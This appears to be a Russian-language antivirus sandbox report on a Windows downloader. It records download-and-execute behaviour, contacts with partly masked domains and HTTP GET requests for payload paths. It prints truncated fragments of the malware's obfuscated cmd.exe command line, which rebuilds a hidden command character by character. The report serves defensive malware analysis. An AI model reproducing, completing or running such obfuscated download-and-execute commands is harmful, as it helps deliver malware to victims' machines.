Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set Xm2=TalVEiYaizEvhYVWYiRcSsjiOpnao;LGJNub$dFBe=H2)Cfq4Dr'., t7}g\(8{1ky@+:0wm6\XIx5Q-&&for %j in (36;37;16;23;41;51;2;18;22;51;29;36;20;39;28;41...
Сетевая активность
Подключается к
- 'fe###rvice.com':80
- 'ex####hfm.com.au':80
- 'ge####anluis.com':80
- 'ge####anluis.com':443
- 'fu######tal-learning.com':80
TCP
Запросы HTTP GET
- http://fe###rvice.com/0xlXjXH
- http://ex####hfm.com.au/1mllu0
- http://ge####anluis.com/dzC7aX
- http://fu######tal-learning.com/54Rizs
Другие
- 'ge####anluis.com':443
UDP
- DNS ASK fe###rvice.com
- DNS ASK ex####hfm.com.au
- DNS ASK g-##m.dk
- DNS ASK ge####anluis.com
- DNS ASK fu######tal-learning.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set Xm2=TalVEiYaizEvhYVWYiRcSsjiOpnao;LGJNub$dFBe=H2)Cfq4Dr'., t7}g\(8{1ky@+:0wm6\XIx5Q-&&for %j in (36;37;16;23;41;51;2;18;22;51;29;36;20;39;28;41...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set Xm2=TalVEiYaizEvhYVWYiRcSsjiOpnao;LGJNub$dFBe=H2)Cfq4Dr'., t7}g/(8{1ky@+:0wm6\XIx5Q-&&for %j in (36;37;16;23;41;51;2;18;22;51;29;36;20;39;28;41;26;40;70;79;28;35;22;40;19;55;54;33;40;...
